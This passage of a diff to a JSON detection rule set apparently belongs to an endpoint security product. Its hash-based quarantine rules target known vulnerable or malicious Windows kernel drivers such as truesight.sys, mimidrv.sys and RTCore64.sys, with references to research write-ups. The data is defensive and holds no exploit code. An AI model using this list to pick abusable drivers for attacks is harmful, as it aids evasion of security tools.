"2026-03-23T11:45:29.605120Z", + "creation_date": "2026-03-23T11:45:29.605122Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605127Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bf80a8d047b6dbd239e3e6869b931c31a62de059b24bd76c3564df9125b5aac3", + "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "67d89456-928c-5071-820d-d708e96f3ce1", + "test_maturity_current_count": 0, 
+ "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967261Z", + "creation_date": "2026-03-23T11:45:29.967264Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967273Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "63d61549030fcf46ff1dc138122580b4364f0fe99e6b068bc6a3d6903656aff0", + "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "67dc737d-9d23-5aa9-b22f-52f2b414088d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810733Z", + "creation_date": "2026-03-23T11:45:31.810735Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810740Z", + "rule_level": null, + "rule_level_override": null, 
+ "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c0778ad68d1485165c7295582d49f565912300972b0779bd4a9a1bfb0730448c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "67f2e03b-64c0-553e-a24c-64a3c956439f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977729Z", + "creation_date": "2026-03-23T11:45:29.977731Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977737Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cc383ad11e9d06047a1558ed343f389492da3ac2b84b71462aee502a2fa616c8", + "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "67f41213-84f0-5cf2-a2cf-3db8860720f6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621846Z", + "creation_date": "2026-03-23T11:45:29.621848Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621853Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "12af7c39519e16307c2c62a84ca40017b43acf7fa90ec97c182701ffcffa1b61", + "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "67fc1afe-44f9-5c8c-a893-7088b12e29c0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621599Z", + "creation_date": "2026-03-23T11:45:29.621601Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621606Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "910479467ef17b9591d8d42305e7f6f247ad41c60ec890a1ffbe331f495ed135", + "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) 
[https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6806dd67-8e9e-5764-b246-0e030241ad7e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.480909Z", + "creation_date": "2026-03-23T11:45:31.480912Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.480922Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b0a310c13415346c957240adfd34f0c7cdc893e52b3bdfe6c7dc0f779bef69d5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6814e803-0c08-5842-a4c3-7c0766c99a17", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976660Z", + "creation_date": "2026-03-23T11:45:29.976662Z", + 
"enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976669Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2a30ad675142cf411e7e5f5c53c6423de570a398295b0956130a7a7d77383103", + "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6836d735-b0ac-58ca-854a-53372572dec7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.470042Z", + "creation_date": "2026-03-23T11:45:30.470045Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.470054Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d67899bbb43fec01b10b33105eb970d44aac5b81dd22cab8bf2d86302f6d08a8", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "68392165-efae-5b5b-a804-d50676a26e74", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812616Z", + "creation_date": "2026-03-23T11:45:31.812618Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812624Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "180eddf47ade5cc9a22bb564b989d4671dee90eded8e6317f34cf298ba27d4e5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "683cfa93-682f-5cbe-9b0b-12cc2b542bde", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493060Z", + "creation_date": "2026-03-23T11:45:31.493064Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493071Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1485550a497d9d37a6590b89670694b3d543f4c2dbabd11ae5998c169483a34f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "68876d9d-0013-5845-85bc-ea99fb5d5f86", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622926Z", + "creation_date": "2026-03-23T11:45:29.622928Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622934Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c0752dc13548fe8d3b5a7a73c04ebcd7bcfa5e4ecec9ba233d193bd36ed4b54e", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "68954278-6904-5a9d-84a5-795295634088", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972807Z", + "creation_date": "2026-03-23T11:45:29.972808Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972814Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "230fe99d425e870cc03383b195d5a8c0ef3d191baaa4104f6f4cdee4960c48fc", + "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "68ae7d1d-0f4a-571b-9b35-7246af338288", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146186Z", + "creation_date": "2026-03-23T11:45:31.146188Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146194Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": 
null, + "references": [], + "type": "hash", + "value": "971fb60f6027f273c78d9cce3c64d2d967266f64e55c11f1280f0648c517b9a4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "68af214a-3326-579d-a5c1-e272459850c4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611966Z", + "creation_date": "2026-03-23T11:45:29.611968Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611973Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "69e3fda487a5ec2ec0f67b7d79a5a836ff0036497b2d1aec514c67d2efa789b2", + "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "68b5ff02-1ad9-5241-8075-da91eb972cef", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149698Z", + "creation_date": "2026-03-23T11:45:31.149702Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149711Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "81e7666f31109310bef267df23fad8165004b72ef8ff75a6ae45026bceb33a66", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "68ba57f4-7093-549f-a381-76c1c838ecd2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808450Z", + "creation_date": "2026-03-23T11:45:31.808452Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808458Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dbe13204cff54a9a8fd19aba5b40e994bfe29f1bfe18547a5975e546ca4b4bb9", + "comment": 
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "68cf5ceb-eb03-55d5-ae1e-cd261e05f4d9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.830359Z", + "creation_date": "2026-03-23T11:45:31.830361Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.830367Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "661e45e398bcaa6be493ac9bdc0eae5f604d92c9f72c0a382ce95ea609c66339", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "68f5c4da-7818-5ff9-8e5c-7adcc5a9fe50", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.142868Z", + "creation_date": "2026-03-23T11:45:32.142870Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.142892Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ae55a0e93e5ef3948adecf20fa55b0f555dcf40589917a5bfbaa732075f0cc12", + "comment": "Vulnerable Filseclab Driver (aka fildds.sys, filnk.sys and filwfp.sys) [https://twitter.com/SophosXOps/status/1764933865574207677] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "68feafde-76f3-554d-826a-9bf36020231e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607293Z", + "creation_date": "2026-03-23T11:45:29.607295Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607301Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5f7e47d728ac3301eb47b409801a0f4726a435f78f1ed02c30d2a926259c71f3", + "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]", + 
"source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "69021801-4155-5739-b3da-a4c524b16832", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150581Z", + "creation_date": "2026-03-23T11:45:31.150583Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150589Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e9f54bd1f5d87827e228c285661303da1ecf8f4b566ef566487b356df5afaf75", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6904b38d-5e71-5ea5-9530-ecdff1f51fce", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.491778Z", + "creation_date": "2026-03-23T11:45:31.491780Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": 
true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491786Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0e8a8c2d6cab17e8f29a8ce5eededc2be0bf373c71dc23b3b24a03e172cef151", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "690f0ca7-2a6f-5d89-bcd1-707bfadcfc6c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820443Z", + "creation_date": "2026-03-23T11:45:30.820445Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820450Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "71423a66165782efb4db7be6ce48ddb463d9f65fd0f266d333a6558791d158e5", + "comment": "Vulnerable Kernel Driver (aka rtport.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "690ff1ef-3024-5d4f-9b98-407823a40d58", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983938Z", + "creation_date": "2026-03-23T11:45:29.983940Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983952Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "57d36936fbf8785380536b03e5d9be172e5dd5c3bf435e19875a80aa96f97e1f", + "comment": "Vulnerable Kernel Driver (aka iomem64.sys) [https://www.loldrivers.io/drivers/04d377f9-36e0-42a4-8d47-62232163dc68/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "692308e3-90eb-5cea-9242-14fe798ec6a1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.453254Z", + "creation_date": "2026-03-23T11:45:30.453257Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.453266Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + 
